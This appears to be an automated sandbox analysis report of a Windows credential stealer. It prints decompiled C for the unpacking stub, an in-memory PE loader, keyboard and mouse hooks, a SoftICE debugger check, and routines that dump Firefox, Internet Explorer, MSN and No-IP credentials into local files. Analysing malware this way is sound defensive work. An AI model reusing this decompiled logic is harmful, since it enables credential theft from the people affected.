                                    													_t322 = _t322 - 0xfffffffc;
                                    													asm("adc ebx, ebx");
                                    												}
                                    												asm("adc ecx, ecx");
                                    												_t261 = _t262 + _t262;
                                    												__eflags = _t261;
                                    											} while (__eflags >= 0);
                                    											if(__eflags != 0) {
                                    												break;
                                    											}
                                    											_t261 =  *_t322;
                                    											_t322 = _t322 - 0xfffffffc;
                                    											__eflags = _t322;
                                    											asm("adc ebx, ebx");
                                    										} while (_t322 >= 0);
                                    										_t272 = _t272 + 2;
                                    										__eflags = _t272;
                                    										goto L77;
                                    									}
                                    								}
                                    								_t70 =  *_t322;
                                    								_t322 = _t322 + 1;
                                    								_t71 = _t70 ^ 0xffffffff;
                                    								__eflags = _t71;
                                    								if(__eflags == 0) {
                                    									_pop(_t323);
                                    									_t317 = _t323;
                                    									goto L83;
                                    									do {
                                    										do {
                                    											L83:
                                    											_t72 =  *_t317;
                                    											_t317 =  &(_t317[0]);
                                    											__eflags = _t72 - 0xe8 - 1;
                                    										} while (_t72 - 0xe8 > 1);
                                    										__eflags =  *_t317 - 1;
                                    									} while ( *_t317 != 1);
                                    									asm("rol eax, 0x10");
                                    									 *_t317 = ( *_t317 >> 8) - _t317 + _t323;
                                    									__eflags =  &(_t317[1]);
                                    									asm("loop 0xffffffdb");
                                    									_t50 =  &(_t323[0x13c00]); // 0x450000
                                    									_t319 = _t50;
                                    									while(1) {
                                    										L86:
                                    										_t82 =  *_t319;
                                    										__eflags = _t82;
                                    										if(_t82 == 0) {
                                    											break;
                                    										}
                                    										_t51 =  &(_t319[4]); // 0xf1ec
                                    										_t271 = _t323 +  *_t51;
                                    										_t321 =  &(_t319[8]);
                                    										__eflags = _t321;
                                    										_t325 = LoadLibraryA( &(_t323[0x156c2]) + _t82);
                                    										while(1) {
                                    											_t319 =  &(_t321[1]);
                                    											_t255 =  *_t321;
                                    											__eflags = _t255;
                                    											if(_t255 == 0) {
                                    												goto L86;
                                    											}
                                    											asm("repne scasb");
                                    											_t82 = GetProcAddress(_t325, _t319);
                                    											__eflags = _t82;
                                    											if(_t82 == 0) {
                                    												ExitProcess();
                                    											}
                                    											 *_t271 = _t82;
                                    											_t271 =  &(_t271[4]);
                                    										}
                                    									}
                                    									_t326 = _t323[0x156f6];
                                    									_t59 = _t323 - 0x1000; // 0x400000
                                    									_t320 = _t59;
                                    									VirtualProtect(_t320, 0x1000, 4, _t328);
                                    									_t60 = _t320 + 0x21f; // 0x40021f
                                    									_t84 = _t60;
                                    									 *_t84 =  *_t84 & 0x0000007f;
                                    									_t61 =  &(_t84[0x28]);
                                    									 *_t61 = _t84[0x28] & 0x0000007f;
                                    									__eflags =  *_t61;
                                    									_t85 = _t82;
                                    									_push(_t85);
                                    									VirtualProtect(_t320, 0x1000, _t85, _t328); // executed
                                    									asm("popad");
                                    									_t88 =  &_v128;
                                    									do {
                                    										_push(0);
                                    										__eflags = _t328 - _t88;
                                    									} while (_t328 != _t88);
                                    									_t329 = _t328 - 0xffffff80;
                                    									_push(_t326);
                                    									_t327 = _t329;
                                    									_t274 = 0xb;
                                    									do {
                                    										_push(0);
                                    										_push(0);
                                    										_t274 = _t274 - 1;
                                    										__eflags = _t274;
                                    									} while (_t274 != 0);
                                    									_push(0x1000);
                                    									E00403418(0x40bb04);
                                    									_push(_t327);
                                    									_push(0x40c0c4);
                                    									_push( *[fs:eax]);
                                    									 *[fs:eax] = _t329;
                                    									_t92 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed
                                    									_t266 = _t92;
                                    									_t93 = GetLastError();
                                    									__eflags = _t93 - 0xb7;
                                    									if(_t93 != 0xb7) {
                                    										CloseHandle(_t266); // executed
                                    									} else {
                                    										CloseHandle(_t266);
                                    										Sleep(0x2ee0);
                                    									}
                                    									_t95 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
                                    									_t267 = _t95;
                                    									__eflags = GetLastError() - 0xb7;
                                    									if(__eflags != 0) {
                                    										CloseHandle(_t267);
                                    										_t98 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
                                    										_t268 = _t98;
                                    										__eflags = GetLastError() - 0xb7;
                                    										if(__eflags != 0) {
                                    											CloseHandle(_t268);
                                    											L27:
                                    											E004013A4(1,  &_v80);
                                    											_t287 = "Restart";
                                    											E00401E94(_v80, "Restart");
                                    											if(__eflags != 0) {
                                    												Sleep(0x3e8); // executed
                                    											}
                                    											E00404604(_t274, __eflags);
                                    											E0040491C();
                                    											E0040B118(_t287, _t320, _t323);
                                    											_t108 =  *0x40d204; // 0x40e8f8
                                    											_t111 = E00403568(0, 0, E00401F48( *_t108)); // executed
                                    											_t269 = _t111;
                                    											_t112 = GetLastError();
                                    											__eflags = _t112 - 0xb7;
                                    											if(_t112 != 0xb7) {
                                    												CloseHandle(_t269); // executed
                                    											} else {
                                    												CloseHandle(_t269);
                                    												Sleep(0x3e8);
                                    												_t136 =  *0x40d204; // 0x40e8f8
                                    												_t269 = E00403568(0, 0, E00401F48( *_t136));
                                    												_t140 = GetLastError();
                                    												__eflags = _t140 - 0xb7;
                                    												if(_t140 != 0xb7) {
                                    													CloseHandle(_t269);
                                    												} else {
                                    													CloseHandle(_t269);
                                    													Sleep(0x3e8);
                                    													_t143 =  *0x40d204; // 0x40e8f8
                                    													_t269 = E00403568(0, 0, E00401F48( *_t143));
                                    													_t147 = GetLastError();
                                    													__eflags = _t147 - 0xb7;
                                    													if(_t147 != 0xb7) {
                                    														CloseHandle(_t269);
                                    													} else {
                                    														CloseHandle(_t269);
                                    														Sleep(0x3e8);
                                    														_t150 =  *0x40d204; // 0x40e8f8
                                    														_t269 = E00403568(0, 0, E00401F48( *_t150));
                                    														_t154 = GetLastError();
                                    														__eflags = _t154 - 0xb7;
                                    														if(_t154 != 0xb7) {
                                    															CloseHandle(_t269);
                                    														} else {
                                    															ExitProcess(0);
                                    														}
                                    													}
                                    												}
                                    											}
                                    											__eflags =  *((char*)( *0x40d1dc)) - 1;
                                    											if( *((char*)( *0x40d1dc)) != 1) {
                                    												__eflags = 0;
                                    												E004013A4(0, 0x40f1e8);
                                    											} else {
                                    												E004013A4(0,  &_v88);
                                    												E00406B54(_v88, _t269,  &_v84, _t320, _t323); // executed
                                    												E00401B14(0x40f1e8, _v84);
                                    											}
                                    											E00406008( &_v92);
                                    											E00401D58( &_v92, "XX--XX--XX.txt");
                                    											E0040B93C( *0x40f1e8, _t269, _v92, _t320, _t323, __eflags);
                                    											_t123 =  *0x40d214; // 0x40e8f4
                                    											__eflags =  *_t123 - 1;
                                    											if(__eflags == 0) {
                                    												E0040B7FC(_t269, _t320, _t323, __eflags);
                                    												Sleep(0x3e8); // executed
                                    											}
                                    											E0040B3C0(_t269, _t274, _t320, _t323); // executed
                                    											L44:
                                    											__eflags = 0;
                                    											_pop(_t291);
                                    											 *[fs:eax] = _t291;
                                    											_push(0x40c0cb);
                                    											return E00401AE4( &_v92, 0x12);
                                    										}
                                    										CloseHandle(_t268);
                                    										_t157 =  *0x40e670; // 0x400000
                                    										SetWindowsHookExA(0xd, E0040B0B8, _t157, 0);
                                    										_t160 =  *0x40e670; // 0x400000
                                    										SetWindowsHookExA(0xe, E0040B108, _t160, 0);
                                    										while(1) {
                                    											_t163 = E0040BA84(__eflags);
                                    											__eflags = _t163;
                                    											if(_t163 != 0) {
                                    												break;
                                    											}
                                    											E00405918();
                                    										}
                                    										ExitProcess(0);
                                    										goto L27;
                                    									}
                                    									CloseHandle(_t267);
                                    									E00409AD4( &_v24, _t267, _t323, __eflags);
                                    									E00401B14(0x40f1ec, _v24);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v28);
                                    										E00401D58( &_v28, "NOIP.abc");
                                    										_pop(_t283);
                                    										E00405D70(_v28, _t267, _t283,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409D28( &_v32, _t267, _t320, _t323);
                                    									_t297 = _v32;
                                    									E00401B14(0x40f1ec, _v32);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v36);
                                    										E00401D58( &_v36, "MSN.abc");
                                    										_t297 =  *0x40f1ec;
                                    										_pop(_t282);
                                    										E00405D70(_v36, _t267, _t282,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409EF8( &_v40, _t267, _t297, _t320, _t323);
                                    									E00401B14(0x40f1ec, _v40);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v44);
                                    										E00401D58( &_v44, "FIREFOX.abc");
                                    										_pop(_t281);
                                    										E00405D70(_v44, _t267, _t281,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409A84( &_v48);
                                    									E00401B14(0x40f1ec, _v48);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v52);
                                    										E00401D58( &_v52, "IELOGIN.abc");
                                    										_pop(_t280);
                                    										E00405D70(_v52, _t267, _t280,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409A90( &_v56);
                                    									E00401B14(0x40f1ec, _v56);
                                    									__eflags =  *0x40f1ec;
                                    									if(__eflags != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v60);
                                    										E00401D58( &_v60, "IEPASS.abc");
                                    										_pop(_t279);
                                    										E00405D70(_v60, _t267, _t279,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409A9C( &_v64, _t320, _t323, __eflags, _t335);
                                    									E00401B14(0x40f1ec, _v64);
                                    									__eflags =  *0x40f1ec;
                                    									if(__eflags != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v68);
                                    										E00401D58( &_v68, "IEAUTO.abc");
                                    										_pop(_t278);
                                    										E00405D70(_v68, _t267, _t278,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409AB8( &_v72, _t320, _t323, __eflags);
                                    									E00401B14(0x40f1ec, _v72);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v76);
                                    										E00401D58( &_v76, "IEWEB.abc");
                                    										_pop(_t277);
                                    										E00405D70(_v76, _t267, _t277,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									goto L44;
                                    								}
                                    								_t325 = _t71 >> 1;
                                    								goto L67;
                                    							}
                                    							_t261 =  *_t322;
                                    							_t322 = _t322 - 0xfffffffc;
                                    							asm("adc ebx, ebx");
                                    							if(_t322 < 0) {
                                    								goto L62;
                                    							}
                                    							L56:
                                    							_t65 = _t65 - 1;
                                    							_t259 = _t261 + _t261;
                                    							if(_t259 == 0) {
                                    								_t259 =  *_t322;
                                    								_t322 = _t322 - 0xfffffffc;
                                    								asm("adc ebx, ebx");
                                    							}
                                    							asm("adc eax, eax");
                                    							_t260 = _t259 + _t259;
                                    							if(_t260 == 0) {
                                    								_t260 =  *_t322;
                                    								_t322 = _t322 - 0xfffffffc;
                                    								asm("adc ebx, ebx");
                                    							}
                                    							asm("adc eax, eax");
                                    							_t261 = _t260 + _t260;
                                    							_t332 = _t261;
                                    							if(_t332 >= 0) {
                                    								goto L56;
                                    							}
                                    						}
                                    						L47:
                                    						_t259 = _t259 + _t259;
                                    						__eflags = _t259;
                                    					} while (_t259 != 0);
                                    				}
                                    			}
                                    0x0040c079
                                    0x0040c086
                                    0x0040c08b
                                    0x0040c090
                                    0x0040c093
                                    0x0040c095
                                    0x0040c09f
                                    0x0040c09f
                                    0x0040c0a4
                                    0x0040c0a9
                                    0x0040c0a9
                                    0x0040c0ab
                                    0x0040c0ae
                                    0x0040c0b1
                                    0x0040c0c3
                                    0x0040c0c3
                                    0x0040bebd
                                    0x0040bec4
                                    0x0040bed2
                                    0x0040bed9
                                    0x0040bee7
                                    0x0040bef3
                                    0x0040bef3
                                    0x0040bef8
                                    0x0040befa
                                    0x00000000
                                    0x00000000
                                    0x0040beee
                                    0x0040beee
                                    0x0040befe
                                    0x00000000
                                    0x0040befe
                                    0x0040bc71
                                    0x0040bc79
                                    0x0040bc86
                                    0x0040bc8b
                                    0x0040bc92
                                    0x0040bc9e
                                    0x0040bca2
                                    0x0040bcaf
                                    0x0040bcbd
                                    0x0040bcbe
                                    0x0040bcbe
                                    0x0040bcc6
                                    0x0040bccb
                                    0x0040bcd3
                                    0x0040bcd8
                                    0x0040bcdf
                                    0x0040bceb
                                    0x0040bcef
                                    0x0040bcfc
                                    0x0040bd04
                                    0x0040bd0a
                                    0x0040bd0b
                                    0x0040bd0b
                                    0x0040bd13
                                    0x0040bd20
                                    0x0040bd25
                                    0x0040bd2c
                                    0x0040bd38
                                    0x0040bd3c
                                    0x0040bd49
                                    0x0040bd57
                                    0x0040bd58
                                    0x0040bd58
                                    0x0040bd60
                                    0x0040bd6d
                                    0x0040bd72
                                    0x0040bd79
                                    0x0040bd85
                                    0x0040bd89
                                    0x0040bd96
                                    0x0040bda4
                                    0x0040bda5
                                    0x0040bda5
                                    0x0040bdad
                                    0x0040bdba
                                    0x0040bdbf
                                    0x0040bdc6
                                    0x0040bdd2
                                    0x0040bdd6
                                    0x0040bde3
                                    0x0040bdf1
                                    0x0040bdf2
                                    0x0040bdf2
                                    0x0040bdfa
                                    0x0040be07
                                    0x0040be0c
                                    0x0040be13
                                    0x0040be1f
                                    0x0040be23
                                    0x0040be30
                                    0x0040be3e
                                    0x0040be3f
                                    0x0040be3f
                                    0x0040be47
                                    0x0040be54
                                    0x0040be59
                                    0x0040be60
                                    0x0040be70
                                    0x0040be74
                                    0x0040be81
                                    0x0040be8f
                                    0x0040be90
                                    0x0040be90
                                    0x00000000
                                    0x0040be60
                                    0x00455c8f
                                    0x00000000
                                    0x00455c8f
                                    0x00455c53
                                    0x00455c55
                                    0x00455c58
                                    0x00455c5a
                                    0x00000000
                                    0x00000000
                                    0x00455c5c
                                    0x00455c5c
                                    0x00455c5d
                                    0x00455c5f
                                    0x00455c61
                                    0x00455c63
                                    0x00455c66
                                    0x00455c66
                                    0x00455c68
                                    0x00455c40
                                    0x00455c42
                                    0x00455c44
                                    0x00455c46
                                    0x00455c49
                                    0x00455c49
                                    0x00455c4b
                                    0x00455c4d
                                    0x00455c4d
                                    0x00455c4f
                                    0x00000000
                                    0x00000000
                                    0x00455c4f
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c39

                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 00455D52
                                    • GetProcAddress.KERNEL32(?,0044FFF9), ref: 00455D67
                                    • ExitProcess.KERNEL32(?,0044FFF9), ref: 00455D78
                                    • VirtualProtect.KERNELBASE(00400000,00001000,00000004,?,7479411C), ref: 00455D95
                                    • VirtualProtect.KERNELBASE(00400000,00001000), ref: 00455DAA
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
• Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    • Opcode ID: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction ID: 60ef33331dc92bd8925b533821660d0d47773761dcb7daf1aaa77766f171e575
                                    • Opcode Fuzzy Hash: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction Fuzzy Hash: 2E511A72951B124BD7214EB89CE46B577A4EB12336728073ACDE1C73C7E7A8580E8758
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 81%
                                    			E00403EC0(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, long __edi, void* __esi, intOrPtr _a4) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				long _v32;
                                    				char _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				void* _v48;
                                    				signed int _v52;
                                    				long _v56;
                                    				char _v60;
                                    				void* _t116;
                                    				void* _t121;
                                    				void* _t135;
                                    				intOrPtr _t138;
                                    				void* _t150;
                                    				void* _t175;
                                    				signed int _t184;
                                    				signed int _t185;
                                    				intOrPtr _t189;
                                    				intOrPtr _t197;
                                    				intOrPtr _t204;
                                    				intOrPtr _t205;
                                    				signed int _t209;
                                    				signed int _t210;
                                    				void* _t213;
                                    				void* _t216;
                                    				intOrPtr* _t217;
                                    
                                    				_t208 = __edi;
                                    				_t215 = _t216;
                                    				_t217 = _t216 + 0xffffffc8;
                                    				_push(__edi);
                                    				_v44 = __ecx;
                                    				_t183 = __edx;
                                    				_v40 = __eax;
                                    				_t197 =  *0x4037bc; // 0x4037c0
                                    				E0040242C( &_v36, _t197);
                                    				_push(_t216);
                                    				_push(0x4040ba);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t217;
                                    				_push(0);
                                    				_push(_v44);
                                    				asm("cdq");
                                    				asm("adc edx, [esp+0x4]");
                                    				_v8 =  *((intOrPtr*)(_v44 + 0x3c)) +  *_t217;
                                    				_t116 = VirtualAlloc(__edx,  *(_v8 + 0x50), 0x2000, 1); // executed
                                    				_v16 = _t116;
                                    				_v12 = _v16 -  *((intOrPtr*)(_v8 + 0x34));
                                    				_t121 = VirtualAlloc(_v16,  *(_v8 + 0x54), 0x1000, 4); // executed
                                    				_v48 = _t121;
                                    				E00401258(_v44,  *(_v8 + 0x54), _v48);
                                    				VirtualProtect(_v48,  *(_v8 + 0x54), 2,  &_v56); // executed
                                    				_t213 = _v8 + 0x18 + ( *(_v8 + 0x14) & 0x0000ffff);
                                    				_t135 = ( *(_v8 + 6) & 0x0000ffff) - 1;
                                    				if(_t135 >= 0) {
                                    					_v60 = _t135 + 1;
                                    					_t185 = 0;
                                    					do {
                                    						_t208 =  *(_t213 + 8 + (_t185 + _t185 * 4) * 8);
                                    						_v52 =  *((intOrPtr*)(_t213 + 0x10 + (_t185 + _t185 * 4) * 8));
                                    						if(_t208 < _v52) {
                                    							_t210 = _t208 ^ _v52;
                                    							_v52 = _v52 ^ _t210;
                                    							_t208 = _t210 ^ _v52;
                                    						}
                                    						_t175 = VirtualAlloc( *((intOrPtr*)(_t213 + 0xc + (_t185 + _t185 * 4) * 8)) + _v16, _t208, 0x1000, 4); // executed
                                    						_v48 = _t175;
                                    						E00401414(_v48, _t208);
                                    						E00401258( *((intOrPtr*)(_t213 + 0x14 + (_t185 + _t185 * 4) * 8)) + _v44, _v52, _v48);
                                    						_t185 = _t185 + 1;
                                    						_t66 =  &_v60;
                                    						 *_t66 = _v60 - 1;
                                    					} while ( *_t66 != 0);
                                    				}
                                    				_t138 =  *((intOrPtr*)(_v8 + 0x28)) + _v16;
                                    				_v28 = _t138;
                                    				_v24 = _t138;
                                    				_v36 = _v16;
                                    				_v32 =  *(_v8 + 0x50);
                                    				_push(0);
                                    				E00402FBC();
                                    				_t145 =  *((intOrPtr*)(_v8 + 0xa0));
                                    				if( *((intOrPtr*)(_v8 + 0xa0)) != 0) {
                                    					E00403D08(_t145 + _v16, _t215);
                                    				}
                                    				_t147 =  *((intOrPtr*)(_v8 + 0x80));
                                    				if( *((intOrPtr*)(_v8 + 0x80)) != 0) {
                                    					E00403D84(_t147 + _v16, _t183, _t208, _t213, _t215); // executed
                                    				}
                                    				_t150 = ( *(_v8 + 6) & 0x0000ffff) - 1;
                                    				if(_t150 >= 0) {
                                    					_v60 = _t150 + 1;
                                    					_t184 = 0;
                                    					do {
                                    						_t209 = _t184 + _t184 * 4;
                                    						VirtualProtect( *((intOrPtr*)(_t213 + 0xc + _t209 * 8)) + _v16,  *(_t213 + 8 + _t209 * 8), E00403C98( *((intOrPtr*)(_t213 + 0x24 + _t209 * 8))),  &_v56); // executed
                                    						_t184 = _t184 + 1;
                                    						_t101 =  &_v60;
                                    						 *_t101 = _v60 - 1;
                                    					} while ( *_t101 != 0);
                                    				}
                                    				_t189 =  *0x4037bc; // 0x4037c0
                                    				E00402704(_a4, _t189,  &_v36);
                                    				_pop(_t204);
                                    				 *[fs:eax] = _t204;
                                    				_push(E004040C1);
                                    				_t205 =  *0x4037bc; // 0x4037c0
                                    				return E004024F0( &_v36, _t205);
			}

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 00403F17
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F3D
                                    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F67
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403FBF
                                    • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 00404082
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
• Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
• Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$Protect
                                    • String ID:
                                    • API String ID: 655996629-0
                                    • Opcode ID: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction ID: b04bee7947df74310e6e8ccd123ea0b1f62a61930ae828744bf4897096846573
                                    • Opcode Fuzzy Hash: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction Fuzzy Hash: C371D475A00208AFCB10DFA9D981EAEB7F8FF48314F15856AE905F7391D634EA04CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E00406088(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __esi, void* __eflags, intOrPtr* _a4, char _a8) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				void* _v16;
                                    				int _v20;
                                    				int _v24;
                                    				long _t35;
                                    				long _t46;
                                    				intOrPtr _t66;
                                    				void* _t72;
                                    				char* _t73;
                                    				void* _t76;
                                    
                                    				_v12 = __ecx;
                                    				_v8 = __edx;
                                    				_t72 = __eax;
                                    				_t60 = _a4;
                                    				E00401F38(_v8);
                                    				E00401F38(_v12);
                                    				E00401F38(_a8);
                                    				_push(_t76);
                                    				_push(0x406167);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t76 + 0xffffffec;
                                    				E00401B14(_a4, _a8);
                                    				_t35 = RegOpenKeyExA(_t72, E00401F48(_v8), 0, 1,  &_v16); // executed
                                    				if(_t35 == 0) {
                                    					_t73 = E00401F48(_v12);
                                    					_t46 = RegQueryValueExA(_v16, _t73, 0,  &_v20, 0,  &_v24); // executed
                                    					if(_t46 == 0) {
                                    						E00402074(_t60, _v24);
                                    						RegQueryValueExA(_v16, _t73, 0,  &_v20, E00401F48( *_t60),  &_v24); // executed
                                    						E00402074(_t60, _v24 - 1);
                                    					}
                                    					RegCloseKey(_v16); // executed
                                    				}
                                    				_pop(_t66);
                                    				 *[fs:eax] = _t66;
                                    				_push(E0040616E);
                                    				E00401AE4( &_v12, 2);
                                    				return E00401AC0( &_a8);
			}

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
• Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
• Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction ID: 0e00d036d103dc2b2ef1cfb5c67197bce49365ef8cbb96d3ced269820940c9d9
                                    • Opcode Fuzzy Hash: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction Fuzzy Hash: 3021E075A00109BBDB00EBA9CC82EAE77BCEF49354F504176B914F72D1D778AE058764
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E00405D70(intOrPtr __eax, void* __ebx, long __ecx, char __edx, void* __esi, void* __eflags) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				long _v16;
                                    				void* _t17;
                                    				void* _t28;
                                    				intOrPtr _t33;
                                    				long _t36;
                                    				void* _t39;
                                    
                                    				_t36 = __ecx;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				E00401F38(_v12);
                                    				_push(_t39);
                                    				_push(0x405e0a);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t39 + 0xfffffff4;
                                    				_t17 = CreateFileA(E00401F48(_v8), 0x40000000, 2, 0, 2, 0, 0); // executed
                                    				_t28 = _t17;
                                    				if(_t28 != 0xffffffff) {
                                    					if(_t36 == 0xffffffff) {
                                    						SetFilePointer(_t28, 0, 0, 0);
                                    					}
                                    					WriteFile(_t28, E00401F9C( &_v12), _t36,  &_v16, 0); // executed
                                    					CloseHandle(_t28); // executed
                                    				}
                                    				_pop(_t33);
                                    				 *[fs:eax] = _t33;
                                    				_push(E00405E11);
                                    				return E00401AE4( &_v12, 2);
                                    			}












                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandlePointerWrite
                                    • String ID:
                                    • API String ID: 3604237281-0
                                    • Opcode ID: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction ID: 55d088da9265c3b5ae2f525a133c65af5c973924d17bad78a6645e8f940914b1
                                    • Opcode Fuzzy Hash: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction Fuzzy Hash: F1116D70A407047AE720BB75CC83F9F76ACDB05728FA04677B510B62E2DA786E00896C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00405850() {
                                    				void* _t1;
                                    				void* _t4;
                                    
                                    				_t4 = 0;
                                    				_t1 = CreateFileA("\\\\.\\NTICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
                                    				if(_t1 != 0xffffffff) {
                                    					CloseHandle(_t1);
                                    					_t4 = 1;
                                    				}
                                    				return _t4;
                                    			}






                                    APIs
                                    • CreateFileA.KERNEL32(\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040586A
                                    • CloseHandle.KERNEL32(00000000,\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405875
                                    Strings
